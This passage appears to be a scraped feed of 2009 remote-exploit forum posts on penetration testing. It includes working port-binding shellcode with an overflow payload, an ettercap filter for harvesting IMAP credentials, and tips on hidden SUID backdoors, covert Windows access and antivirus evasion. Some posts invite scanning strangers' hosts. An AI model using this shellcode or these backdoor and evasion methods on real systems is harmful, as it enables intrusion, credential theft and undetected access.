|
But there is an
IP address 192.168.0.1 which can be pinged from my modem as well as my computer the result of the ping is
Quote:
> ping 192.168.0.1
PING 192.168.0.1 (192.168.0.1): 56 data bytes
56 bytes from 192.168.0.1: icmp_seq=0 ttl=250 time=35.0 ms
56 bytes from 192.168.0.1: icmp_seq=1 ttl=250 time=35.0 ms
56 bytes from 192.168.0.1: icmp_seq=2 ttl=250 time=30.0 ms
--- 192.168.0.1 ping statistics ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 30.0/33.3/35.0 ms"
|
I did a traceroute and the result is
Quote:
C:nmap-5.00>tracert 192.168.0.1
Tracing route to 192.168.0.1 over a maximum of 30 hops
1 1 ms <1 ms <1 ms 192.168.1.1
2 34 ms 39 ms 40 ms 116.71.208.1
3 32 ms 32 ms 33 ms 116.71.241.245
4 36 ms 36 ms 36 ms rwp44.pie.net.pk [221.120.253.41]
5 36 ms 36 ms 35 ms 221.120.253.10
6 35 ms 35 ms 35 ms 192.168.0.1
Trace complete.
|
I did nmap with parameters (-sV -oO -v) and the output is
Quote:
C:nmap-5.00>nmap.exe -sV -oO -v 192.168.0.1
Starting Nmap 5.00 at 2009-11-04 19:10 Pakistan Standard Tim
e
NSE: Loaded 3 scripts for scanning.
Initiating Ping Scan at 19:10
Scanning 192.168.0.1 [4 ports]
Completed Ping Scan at 19:10, 0.36s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:10
Completed Parallel DNS resolution of 1 host. at 19:10, 0.04s elapsed
Initiating SYN Stealth Scan at 19:10
Scanning 192.168.0.1 [1000 ports]
Discovered open port 22/tcp on 192.168.0.1
Discovered open port 23/tcp on 192.168.0.1
Completed SYN Stealth Scan at 19:10, 6.40s elapsed (1000 total ports)
Initiating Service scan at 19:10
Scanning 2 services on 192.168.0.1
Completed Service scan at 19:10, 7.56s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.0.1.
NSE: Script Scanning completed.
Host 192.168.0.1 is up (0.043s latency).
Interesting ports on 192.168.0.1:
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open tcpwrapped
23/tcp open telnet?
1720/tcp filtered H.323/Q.931
5060/tcp filtered sip
1 service unrecognized despite returning data. If you know the service/version,
please submit the following fingerprint at
SF-Port23-TCP:V=5.00%I=7%D=11/4%Time=4AF18B47%P=i686-pc-windows-windows%r(
SF:NULL,37,"rnError:Allx20userx20interfacesx2 0arex20used,x20please
SF:x20tryx20later!")%r(GenericLines,37,"rnError :Allx20userx20interfac
SF:esx20arex20used,x20pleasex20tryx20later!") %r(GetRequest,37,"rnEr
SF:ror:Allx20userx20interfacesx20arex20used,x 20pleasex20tryx20later
SF:!")%r [HTTPOptions,37,"rnError:Allx20userx20] interfacesx20arex20use
SF:d,x20pleasex20tryx20later!")%r(RTSPRequest,3 7,"rnError:Allx20user
SF:x20interfacesx20arex20used,x20pleasex20try x20later!")%r(RPCCheck,
SF:223,"xffxfbx01xffxfbx01xffxfbx01xffx fbx03xffxfdx18xffx
SF:fdx1frn****************** ************
SF:************************ *****rn*x20x20
SF:x20x20x20x20x20x20x20x20x20Allx20righ tsx20reservedx20(2000
SF:-2007)x20x20x20x20x20x20x20x20x20x20x20 x20x20x20x20*r
SF:n*x20x20x20x20x20x20x20Withoutx20the x20owner'sx20priorx20w
SF:rittenx20consent,x20x20x20x20x20x20x20 x20*rn*x20nox20dec
SF:ompilingx20orx20reverse-engineeringx20shallx20bex20allowed.x20*
SF:rn*x20Notice:x20x20x20x20x20x20x20x 20x20x20x20x20x20x
SF:20x20x20x20x20x20x20x20x20x20x20x20 x20x20x20x20x20x20
SF:x20x20x20x20x20x20x20x20x20x20x20x20 x20x20x20x20x20x20
SF:*rn*x20x20x20x20x20x20Thisx20isx20a x20privatex20communica
SF:tionx20system.x20x20x20x20x20x20x20x2 0x20x20x20x20*rn
SF:*x20x20x20Unauthorizedx20accessx20orx20us ex20mayx20leadx20tox
SF:20prosecution.x20x20x20*rn******* ************
SF:*********************** ************
SF:*****rnrnrnLoginx20authenticationr nrnrnUsername:")%r(D
SF:NSVersionBindReq,37,"rnError:Allx20userx20i nterfacesx20arex20used
SF:,x20pleasex20tryx20later!")%r(DNSStatusReque st,37,"rnError:Allx20
SF:userx20interfacesx20arex20used,x20pleasex2 0tryx20later!")%r(Help,
SF:37,"rnError:Allx20userx20interfacesx20are x20used,x20pleasex20tr
SF:yx20later!")%r(SSLSessionReq,37,"rnError:All x20userx20interfacesx
SF:20arex20used,x20pleasex20tryx20later!");
Read data files from: C:nmap-5.00
Service detection performed. Please report any incorrect results at
org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.25 seconds
Raw packets sent: 1174 (51.632KB) | Rcvd: 1162 (46.500KB)
|
Another nmap OS fringerprint scan shows
Quote:
Starting Nmap 5.00 (]Nmap - Free Security Scanner For Network Exploration & Security Audits.] ) at 2009-11-04 19:31 Pakistan Standard Ti
e
NSE: Loaded 0 scripts for scanning.
Initiating Ping Scan at 19:31
Scanning 192.168.0.1 [4 ports]
Completed Ping Scan at 19:31, 0.38s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:31
Completed Parallel DNS resolution of 1 host. at 19:31, 0.04s elapsed
Initiating SYN Stealth Scan at 19:31
Scanning 192.168.0.1 [1000 ports]
Discovered open port 23/tcp on 192.168.0.1
Discovered open port 22/tcp on 192.168.0.1
Completed SYN Stealth Scan at 19:31, 7.45s elapsed (1000 total ports)
Initiating OS detection (try #1) against 192.168.0.1
Retrying OS detection (try #2) against 192.168.0.1
Host 192.168.0.1 is up (0.039s latency).
Interesting ports on 192.168.0.1:
Not shown: 996 closed ports
PORT STATE SERVICE
22/tcp open ssh
23/tcp open telnet
1720/tcp filtered H.323/Q.931
5060/tcp filtered sip
Device type: switch|WAP
Running (JUST GUESSING) : HP embedded (88%), D-Link embedded (86%), TRENDnet em
edded (86%), 3Com embedded (86%)
Aggressive OS guesses: HP 4000M ProCurve switch (J4121A) (88%), D-Link DWL-624+
or DWL-2000AP, or TRENDnet TEW-432BRP WAP (86%), 3Com 8810 switch (86%)
No exact OS matches for host (test conditions non-ideal).
TCP Sequence Prediction: Difficulty=18 (Good luck!)
IP ID Sequence Generation: Busy server or unknown class
|
Telneting this machine gives the banner
Quote:
************************************************** *********
* All rights reserved (2000-2007) *
* Without the owner's prior written consent, *
* no decompiling or reverse-engineering shall be allowed. *
* Notice: *
* This is a private communication system. *
* Unauthorized access or use may lead to prosecution. *
************************************************** *********
Login authentication
Username:
|
Neotrace gives the following output
Quote:
Map
Node Data
Node Net Reg IP Address Location Node Name
1 - - 192.168.1.x
2 1 - 192.168.1.1 -
3 2 - 116.71.208.1 -
4 2 - 116.71.241.245 -
5 3 - 221.120.253.41 - rwp44.pie.net.pk
6 3 - 221.120.253.10 - rwp44.pie.net.pk
7 1 - 192.168.0.1 -
Packet Data
Node High Low Avg Total Lost
1 0 0 0 1 0
2 25 25 25 1 0
3 135 135 135 1 0
4 44 44 44 1 0
5 37 37 37 1 0
6 36 36 36 1 0
7 38 38 38 1 0
Network Data
Network id#:1
OrgName: Internet Assigned Numbers Authority
OrgID: IANA
Address: 4676 Admiralty Way, Suite 330
City: Marina del Rey
StateProv: CA
PostalCode: 90292-6695
Country: US
Network id#:2
OrgName: Asia Pacific Network Information Centre
OrgID: APNIC
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU
Network id#:3
OrgName: Asia Pacific Network Information Centre
OrgID: APNIC
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU
|
I think that the ip addresses 192.168.x.x are private addresses and are non-routable (meaning you shouldn't be able to access these addresses if they are not from your internal network). As the traceroute shows that the machine is behind the PIE and it seems to be quite well setup.
I am trying to investigate the machine on my own but have got no ideas how to proceed further
What could this machine be any wild guesses? and one more thing you people should also try probing this machine and make sure not to confuse your own router with it :-)
-
-
17:13
»
remote-exploit
Something interesting just came up when I was talking to a friend of mine - we were discussing a penetration for PCI compliance, and the topic of IPS came up.
The lengthy argument was profuse and emphatic, but the same basic question (I feel) has to be asked:
During a PCI test (or any other), should one request the client turn off the IPS*? The two main arguments that I can see are:
No. The attacker wouldn't be able to get that turned off, why should you.
Yes. What if the attacker gets lucky and finds the IPS on the day it's failed - at least this way you can ensure you are not vulnerable.
So I put it to the rest of you, should the IPS be turned off for the pentester, or should it be left on?
*Turning it into IDS mode for that IP would be acceptable, the concern is the prevention part of the IPS.
-
-
19:03
»
remote-exploit
I'm doing a lab at home via vmware. My attacker is BackTrack (of course) and my target is linux slackware. So far I have only been able to get as far as logging onto it's ftp as anonymous (nothing really useful in there) and able to connect to the target via tftp. I'm still quite new to pen-testing so I'm not sure what I could do with this tftp access. I see that I am able to run commands such as "get" and "put". I was able (i think) to copy netcat over to the target but not sure how I can connect to the target via netcat. Since I don't have access to the target yet, I can't start a listener on the box (unless one of you know a way). If I could start a listener then I assume the best bet would be to retrieve the /bin/bash with the nc -e option. The following are the ports which are open. *this is all on my personal lab, just an fyi*
21 ftp vsftpd 2.0.4
22 ssh OpenSSH 4.3
80 http Apache
[httpd] 2.2.4 mod_ssl/2.2.4 OpenSSL/0.9.8b DAV/2
631 ipp CUPS 1.1
Thanks for any help or a push in the right direction.
-
1:37
»
remote-exploit
Considering the advent of Ubuntu systems, and our own precious Backtrack rolling that particular way, I thought I would do an early release of a tool I have been working on for a while - partly because it may benefit the community, and mostly because my expect skills are not as strong as they used to be and I can't get this operational.
The basic premise is thus: Ubuntu is secure right? You don't run as admin and any malware that access' your desktop can only wipe your stuff, not the system (as if this is
less important to me, but it illustrates the need for good backups). You use sudo to run you nmap scans or maybe start your airodump script, so you're safe. Right?
Wrong
The key to this puzzle is, in fact, the very tool people use to keep themselves safe. Some notes on sudo basics:
- "sudo -s", "sudo sh" or "sudo su -" or variants will grant you a root shell.
- sudo grants you a small amount of time before it "expires", which means you only have to type your password once and you have a while to run root commands at your hearts content
- sudo is not tied to a single console, you can open 18 different Xterms and run it just fine
A, well, flaw I noticed in sudo (if it can be called thus) resides in the 3rd point - sudo does not actually check what console I am operating in. If I am on my desktop, and I type "sudo nc -l 5", anyone who is ssh'd into my box can then type "sudo ./install_rootkit.sh". Further, I can write an expect script (as yet unpublished), to attempt this command (or another such as "sudo -s" for as long as I like) - while the password is being requested, sudo seems to fail to report the attempt (perhaps this is a logging feature I have merely never noticed).
The upside of this? A pentester, or anyone else really, can abuse the sudo powers to gain root on a linux desktop (or server) as easily as if it were vulnerable to sock_sendpage(). The only thing required is some patience.
A note to anyone who wants to try a PoC for this: I presume that my cron/expect combination is not setting up a proper environment, so doing it that way is not a choice. But there is nothing that stops one from running it & and just waiting.
And you thought malware couldn't hurt you.
Implementation I leave up to those of you who have coding practice, but please feel free to PM me a sample code block if you have written one.
-
-
1:38
»
remote-exploit
So I worked a temp job at a college help desk for a couple of weeks. During the lulls in calls, I began poking around the campus network. Nothing intrusive, just a few pings and traceroutes at first. However, as the days went on I became so bored I started mapping the entire network and doing my own security audit of the college. At the end of the two weeks I had a page and a half list of all the problems with the "security" they had implemented. Being the ethical guy I am, I sent the list to the head of the department. Fast forward two months and three emails later, and they've done nothing. Not even the simplest things on the list, like password protect your network printers if your going to use a 1to1 nat and not use acl's to block external access. Personally I wouldn't mess with the network because there's no challenge in it, but I'm to the point where I think these lazy/incompetent admins should be taught a lesson. At the same time I feel bad for the students/faculty that have these morons "protecting" their data. So I'm gonna put it to a vote.
Should I post all the info I obtained?
Should I email the Dean and explain why he should fire these idiots?
Should I email everyone in the student/faculty directory telling them their data isn't safe?
Should I do nothing and let their current security through obscurity model stand?
Should I post this in a different forum where someone might care?
-
-
22:34
»
remote-exploit
Hi,
Sorry for double-posting in the other thread! I missed the fact that my posts have to be approved by a mod and thought my first post would have been lost.
I have the task to demonstrate a buffer overflow with Windows XP (NO service pack installed). There are several tutorials on how to do this on the net. So I just wrote some vulnerable piece of C++ server code including:
char test[20];
...
strcpy( test, attackerstring);
where "attackerstring" is the ordinary much too long string passed by the client (some hundred "A" characters). The BoF seems to work and will crash the application. I am also able to overwrite both EAX and ECX (take a look at the screenshot below). However, I am not able to overwrite the crucial EIP, regardless how ridiculously long the string of "A" characters is. 100 do not work, 500 do not work, 2000+ do not work. It doesn't help either to let OllyDbg pass the exception to my programme.
SCREENSHOT: img101.imageshack.us/img101/5986/ollydbg.jpg
The exploit is running on VMWare Player 2.53 & Windows XP SP 0. All tutorials and forum posts I have browsed require me to access the EIP. Does anybody have an idea why it is not working for me? I'm really despaired by now.
Thanks for your efforts, m.
-
-
19:32
»
remote-exploit
heyy people i cant figure out how to import a nessus .nbe file into my database that i create in msfconsole i no you have to load the sqlite3 plugin then i do db_import_nessus_nbe"C:documents and settingshackboysmy documents"name of nbe file"" << without quotes is this right ? because when i press enter it says *usage db_import_nessus_nbe [.nbe file] any help would be great : )
-
11:13
»
remote-exploit
I am having an issue using the latest version of BeEF. I have set the alert dialogue to autorun and the logs are showing the different IPs as connected. Also, the alert dialogue box is being displayed on the victims. However, they never show up as a Zombie. I know it takes some time to be displayed, but waiting up to five minutes and still no zombies. I am testing using mutillidae on a windows XP SP2 VM and backtrack 4 pre-final running the latest version of BeEF. I have tried IE 6 as well as various versions of FireFox. I do not have any add-ons like no script installed and javascript is enabled on both browsers. Any idea why the Zombies section is not being populated?
Nevermind, I was too quick to post. Turned off autorun and now the zombies are showing up.
-
-
19:42
»
remote-exploit
Hi there,
I'm new to this forum and I hope I can get some help here (and of course I hope I can help other people :-) ). Let's come to the topic:
I'm playing around with buffer overflows because of a project at university.
What I am trying to do is to exploit a really stupid selfwritter server remotely.
The problem is the shellcode, which I did not write myself (shame on me ;) ) but I found on milw0rm. To avoid complications beause of the network I'm now trying local buffer overflows first:
[code]
#include <stdio.h>
#include <string.h>
#include <unistd.h>
void A(char * args) {
char buffer[128];
printf("Adresse von buffer: %xnn", buffer);
memset(buffer, 'B', sizeof(buffer));
strcpy(buffer, args);
printf("nbuff: [%s] (%p)(%d/%d)nn", &buffer, buffer, sizeof(buffer), strlen(buffer));
}
int main(int argc, char * argv[]) {
A(argv[1]);
return 0;
}
[code]
That one works fine with a stupid execve shellcode like this (that was for a smaller buffer...):
[code]
./target `perl -e '{ print "x90x90x90x90xebx14x5bx31xc0x99x88x43 x07x89x5bx08x89x43x0cx8dx4bx08xb0x0bxc dx80xe8xe7xffxffxffx2fx62x69x6ex2fx73 x68"; print "AAAAAA"; print "x40xf8xffxbf"; }'`
[code]
Now I'm trying this shellcode:
[code]
/*
* linux-x86-portbind.c - portbind shellcode 86 bytes for Linux/x86
* Copyright (c) 2006 Gotfault Security <xgc@gotfault.net>
*
* portbind shellcode that bind()'s a shell on port 64713/tcp
*
*/
char shellcode[] =
/* socket(AF_INET, SOCK_STREAM, 0) */
"x6ax66" // push $0x66
"x58" // pop %eax
"x6ax01" // push $0x1
"x5b" // pop %ebx
"x99" // cltd
"x52" // push %edx
"x53" // push %ebx
"x6ax02" // push $0x2
"x89xe1" // mov %esp,%ecx
"xcdx80" // int $0x80
/* bind(s, server, sizeof(server)) */
"x52" // push %edx
"x66x68xfcxc9" // pushw $0xc9fc // PORT = 64713
"x66x6ax02" // pushw $0x2
"x89xe1" // mov $esp,%ecx
"x6ax10" // push $0x10
"x51" // push %ecx
"x50" // push %eax
"x89xe1" // mov %esp,%ecx
"x89xc6" // mov %eax,%esi
"x43" // inc %ebx
"xb0x66" // mov $0x66,%al
"xcdx80" // int $0x80
/* listen(s, anything) */
"xb0x66" // mov $0x66,%al
"xd1xe3" // shl %ebx
"xcdx80" // int $0x80
/* accept(s, 0, 0) */
"x52" // push %edx
"x56" // push %esi
"x89xe1" // mov %esp,%ecx
"x43" // inc %ebx
"xb0x66" // mov $0x66,%al
"xcdx80" // int $0x80
"x93" // xchg %eax,%ebx
/* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */
"x6ax02" // push $0x2
"x59" // pop %ecx
"xb0x3f" // mov $0x3f,%al
"xcdx80" // int $0x80
"x49" // dec %ecx
"x79xf9" // jns dup_loop
/* execve("/bin/sh", ["/bin/sh"], NULL) */
"x6ax0b" // push $0xb
"x58" // pop %eax
"x52" // push %edx
"x68x2fx2fx73x68" // push $0x68732f2f
"x68x2fx62x69x6e" // push $0x6e69622f
"x89xe3" // mov %esp, %ebx
"x52" // push %edx
"x53" // push %ebx
"x89xe1" // mov %esp, %ecx
"xcdx80"; // int $0x80
int main() {
int (*f)() = (int(*)())shellcode;
printf("Length: %un", strlen(shellcode));
f();
}
// milw0rm.com [2006-04-06]
[code]
If I execute that programm the shell on port 64731 works fine. But if I use that shellcode on my target, it crashes before execve():
Code: pentest@****up:~$ ./testoverflow `perl -e 'print "x6ax66x58x6ax01x5bx99x52x53x6ax02x89xe1xcdx80x52x66x68xfcxc9x66x6ax02x89xe1x6ax10x51x50x89xe1x89xc6x43xb0x66xcdx80xb0x66xd1xe3xcdx80x52x56x89xe1x43xb0x66xcdx80x93x6ax02x59xb0x3fxcdx80x49x79xf9x6ax0bx58x52x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52x53x89xe1xcdx80"; print "A"x46; print "x18xf4xffxbf";'`
Adresse von buffer: bffff418
buff: [jfXj[�RSj��̀Rfh��fj��jQP����C�f̀�f��̀RV��C�f̀�jY�?̀Iy�j
XRh//shh/bin��RS��̀AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA���] (0xbffff418)(128/136)
^C
pentest@****up:~$ strace ./testoverflow `perl -e 'print "x6ax66x58x6ax01x5bx99x52x53x6ax02x89xe1xcdx80x52x66x68xfcxc9x66x6ax02x89xe1x6ax10x51x50x89xe1x89xc6x43xb0x66xcdx80xb0x66xd1xe3xcdx80x52x56x89xe1x43xb0x66xcdx80x93x6ax02x59xb0x3fxcdx80x49x79xf9x6ax0bx58x52x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52x53x89xe1xcdx80"; print "A"x46; print "x18xf4xffxbf";'`
execve("./testoverflow", ["./testoverflow", "jfXj1[231RSj2211341315200Rfh374311fj2211341j20QP211341211"...], [/* 37 vars */]) = 0
brk(0) = 0x804b000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fdf000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=74923, ...}) = 0
mmap2(NULL, 74923, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7fcc000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3
read(3, "177ELF111331320h1004344"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1442180, ...}) = 0
mmap2(NULL, 1451632, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7e69000
mprotect(0xb7fc5000, 4096, PROT_NONE) = 0
mmap2(0xb7fc6000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x15c) = 0xb7fc6000
mmap2(0xb7fc9000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7fc9000
close(3) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e68000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e686c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
open("/dev/urandom", O_RDONLY) = 3
read(3, "FN."..., 3) = 3
close(3) = 0
mprotect(0xb7fc6000, 8192, PROT_READ) = 0
mprotect(0x8049000, 4096, PROT_READ) = 0
mprotect(0xb7ffe000, 4096, PROT_READ) = 0
munmap(0xb7fcc000, 74923) = 0
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fde000
write(1, "Adresse von buffer: bffff418nn"..., 30Adresse von buffer: bffff418
) = 30
write(1, "n"..., 1
) = 1
write(1, "buff: [jfXj1[231RSj2211341315200Rfh374311fj2211341j"..., 168buff: [jfXj[�RSj��̀Rfh��fj��jQP����C�f̀�f��̀RV��C�f̀�jY�?̀Iy�j
XRh//shh/bin��RS��̀AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA���] (0xbffff418)(128/136)
) = 168
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
bind(3, {sa_family=AF_INET, sin_port=htons(64713), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
listen(3, 3221222540) = 0
accept(3, 0, 0x3) = 4
dup2(4, 2) = 2
dup2(4, 1) = 1
dup2(4, 0) = 0
--- SIGSEGV (Segmentation fault) @ 0 (0) ---
+++ killed by SIGSEGV +++ Does anybody have an idea how I can solve this problem. I've tried multiple shellcodes now, but no shellcode complexer than the first one works (but they all do if I call them without an overflow - weird).
Regards,
Seppel
-
-
19:47
»
remote-exploit
Let's say you have "restricted user" access to a Linux computer, the kind of user account that can't use "sudo".
If you had physical access to this machine for 10 minutes, what you tweak in it so that from that point on, you can always do whatever you want with it... without the knowledge of anyone else who uses the computer.
I was thinking I'd boot up a live CD or live USB of Linux. Then I'd navigate to "/usr/bin" on the hard disk and make a copy of the file "xterm", maybe name it something obscure like "params" so nobody would look at it twice. Then I'd set the SUID bit on this "params" file.
From that point on, I'd be able to boot up the PC as a "restricted user" and then just run "params" whenever I want a root terminal. And once I have a root terminal, I can do whatever I want :rolleyes:
Any other ideas?
-
-
4:30
»
remote-exploit
Quote:
************************************************** *
Web Server Launched. Welcome to the SET Web Attack.
************************************************** *
[--] Tested on IE6, IE7, IE8 and FireFox [--]
Type <control>-c to exit..
192.168.0.59 - - [26/Oct/2009 05:11:59] "GET / [HTTP] 200 -
|
i get that in one of the window :P that shows my infected computer connect to the exploit i guess, but then i have this in my other window
Quote:
ENCODING => shikata_ga_nai
resource> set ExitOnSession false
ExitOnSession => false
resource> exploit -j
[*] Exploit running as Background job.
msf exploit (handler) >
[*] Handler Binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler
|
and it just fezzes there :P so what is the problem ? ^^ any ides ?
-
-
15:19
»
remote-exploit
Congratulations to HDM & team on this achievement. My condolences to the FLOSS community.
And yep, I also read "Metasploit will remain open source ... blah blah".
-
-
9:01
»
remote-exploit
I had a look a the video recently post by pureh@te that showed how to use "chntpw" to reset the passwords on MSWindows profiles. It's great! :rolleyes:
What I'm wondering though is whether the following would be possible:
1) Boot up BT4 on the victim PC
2) Use "chntpw" to reset all passwords, then simply boot up the PC normally and boot into MSWindows. Use the PC for whatever, type a document, copy a DVD.
3) When you're finished using the PC, reboot it and boot up BT4 again. Copy the old SAM file back.
4) Now reboot the PC normally into MSWindows, the old passwords should be back in place (I think!)
Will this work fine on all versions of XP, Vista and 7?
I'm looking for a way to use a Windows machine without leaving any evidence behind (I know things like file stamps will be changed but that's not a big deal, so long as there's no gaping evidence such as the fact that their normal password isn't accepted anymore!).
Or if anybody has any other idea on how to use an MSWindows PC without leaving evidence, I'd be happy to hear.
-
8:31
»
remote-exploit
Hello!
I have a question. I bought fyodor's book for NMAP and it's been great! I am really learning the internals and best practices. But one thing i'm confused with is the host discovery flags PS PA PU. Syntax should be P[A/S/U]<port list>
Essentially, it should be probing for hosts sending either SYN,ACK or UDP probes to the ports suggested. However, when I use it, I detects hosts that are up but on ports I didn't specify.
E.G. @my house
nmap -PS80,21,25 -PA80,21,25 -PU53 192.168.1.0/24 -v
will yield results for my http server,ftp,dns but also scan ports up to 4444 and higher.
Any reason this is happening? Am I using the flag wrong?
Thank you.
-
-
18:48
»
remote-exploit
posted in the wrong place !
moved to pen testing
I have a works provided connection via IMS ( uk business ISP) and i have been running open VAS against an number of our external IP addresses.
i know that some IP addresses host services that are publicly available, but when i scan for them they don't appear in the report. Also a scan with nessus wont find them from my connection.A targeted connection or nmap scan finds them.
if i connect physically to the network on the external connection 1 hop from the firewall and do the scan the service is found, or target the plug ins and ports from openvas from my connection it's found as well.
The unidentified service varies on the numbers of IP address im scanning, so it looks like something is hitting a threshold and dropping the packets
Contacted the isp and explained the issue, and they have confirmed that there is no packet filters,ids/ips etc on my connection.But to me it looks like it is something they are doing.
i have sent them packet captures from my machine and a capture from the switch the firewall is on which shows i send but its not received.BT have also captured the trafick from my ip and again the scans not showing:mad: ive even tried to scan another device connected to a home connection and check the route to ensure it says within their network!
we are paying a premium for the connection to be able to do unfiltered scans. any ideas on how i can prove where that packets are being stopped ?
-
-
8:46
»
remote-exploit
Hi guys !
A question:
I launched a db_autopwn session and go away,when i was back i found an opened session. That's ok,but the question is:
how can i do to know which exploit worked for that session ?
Hi !
-
-
22:07
»
remote-exploit
So I have BT4 running in a Virtual Machine, and I have Windows 7 as the host computer. I'm trying to write my own Buffer Overflow exploit for an old, vulnerable, version of 3COM FTP, but I'm stuck. I figured out which bytes overwrite the EIP, but I can't figure out where to go from here. I can't find a register that points back into my buffer.
-
-
10:33
»
remote-exploit
Ive been trying to access milw0rm lately and its been down for a while now, after googling around I found some blogs saying that milw0rm was going down but those where dated back to July this year. So does anyone know what exactly happened to milw0rm and if someone managed to grab the latest exploit database from it?
-
-
16:08
»
remote-exploit
Hi guys,
As long as I was misinterpreted on my LinuxQuestions.org post:
h t t p://w w w .linuxquestions. org/questions/linux-newbie-8/linux-console-screenshot-command-760837/#post3713800
I come to you open-minded people!
A friend has a question about the Linux console (non-Graphical) environment.
In fact, he is running a wireless cracking tool, and needs to evidence not only the final output but the actual pace of the crack, like number of beacons on different periods of time, etc...
For me, the best way to do this is by taking screenshots.
But from the shell?
Is it possible to do that without X?
Thanks in advance!
sl33p
-
0:56
»
remote-exploit
Today I came across a problem that I haven't encountered before, a very small installation of users with passphrases that aren't in the standard (smallish) dictionary I use initially during my tests. Operating on a limited time constraint meant I couldn't run my larger ones through, and I had to find another way.
I spent some time auditing the network to find nothing exploitable that didn't require a login, and no extraneous data floating around that I could use.
On a whim I was ettercap'ing one of the XP desktops and watching the packet traces, gaining further information about the system (Symantec Updates in operation etc.) when I noticed some IMAP traffic going to the mail server, unencrypted.
Thinking about it for a bit, I began to bet that the IMAP program would log me in - if only I could get it to send the password again. I wrote an ettercap filter to replace the IMAP "IDLE" string, with "LOGOUT" and loaded it up, and made sure I had tcpdump logging all my traffic.
A couple of msg("Logged out")'s later, and I went to find my packet dump - to discover a base64 encoded string just after the SYN/SYN+ACK/ACK combination that occurs immediately after the LOGOUT closes, and voila: a username and password.
The moral of this long winded story is you should ALWAYS use secure methods of connection - even on internal-behind-the-dmz protected hosts. Properly saved and stored SSL certificates and Kerberos authentication are strongly recommended.
The ettercap filter: Code: if (ip.proto == TCP && tcp.dst == 143) {
if (search(DATA.data, "IDLE")) {
replace("IDLE", "LOGOUT");
msg("Logged out");
}
} To get to the correct password (which was, to be fair, in another of my dictionaries), would have taken me approximately 34 hours.
-
-
12:43
»
remote-exploit
I have recently found that McAfee Enterprise 8 detects the MSF binary payload windows/shell/reverse_tcp (being the skinny version of windows/shell_reverse_tcp). It also does not matter if you encode it with the excellent shikata_ga_nai encoder with as many iterations as you like it still finds it. McAfee doesn't report the payload correctly but enough to delete the file (if that's the McAfee policy). :mad:
Does anyone have any ideas or suggestions using the MSF framework to counter this detection other than using an external payload encrypter or a handcrafted XOR stub?
- Nasher
-
-
10:05
»
remote-exploit
how to connect a telnet server
through a proxy or socks?
it's possible with connect relay ?
i'm try varios socks proxys with putty but without success
it's possible with i2p ? I too created tunnel but without success too
thanks in advanced
-
-
5:35
»
remote-exploit
on updating Metasploit 3.3dev in ubuntu i get 320 exploits and it reports it is at revision 7131 but on BT4 it updates and show 413 exploits and 266 payloads..
why is there a difference the?
the svn info on both the OS is different .. how do i get all the exploits in ubuntu?
svn info on BT4 :
Path: .
URL:
[metasploit.com]
Repository Root:
[metasploit.com]
Repository UUID: 4d416f70-5f16-0410-b530-b9f4589650da
Revision: 7131
Node Kind: directory
Schedule: normal
Last Changed Author: druid
Last Changed Rev: 6193
Last Changed Date: 2009-01-28 11:43:47 +0530 (Wed, 28 Jan 2009)
svn info on Ubuntu 9.04:
Path: .
URL:
[https:]]
Repository Root:
[https:]]
Repository UUID: 4d416f70-5f16-0410-b530-b9f4589650da
Revision: 7131
Node Kind: directory
Schedule: normal
Last Changed Author: kris
Last Changed Rev: 7131
Last Changed Date: 2009-10-06 11:09:05 +0530 (Tue, 06 Oct 2009)
-
5:35
»
remote-exploit
on updating Metasploit 3.3dev in ubuntu i get 320 exploits and it reports it is at revision 7131 but on BT4 it updates and show 413 exploits and 266 payloads..
why is there a difference the?
the svn info on both the OS is different .. how do i get all the exploits in ubuntu?
svn info on BT4 :
Path: .
URL:
[metasploit.com]
Repository Root:
[metasploit.com]
Repository UUID: 4d416f70-5f16-0410-b530-b9f4589650da
Revision: 7131
Node Kind: directory
Schedule: normal
Last Changed Author: druid
Last Changed Rev: 6193
Last Changed Date: 2009-01-28 11:43:47 +0530 (Wed, 28 Jan 2009)
svn info on Ubuntu 9.04:
Path: .
URL:
[https:]]
Repository Root:
[https:]]
Repository UUID: 4d416f70-5f16-0410-b530-b9f4589650da
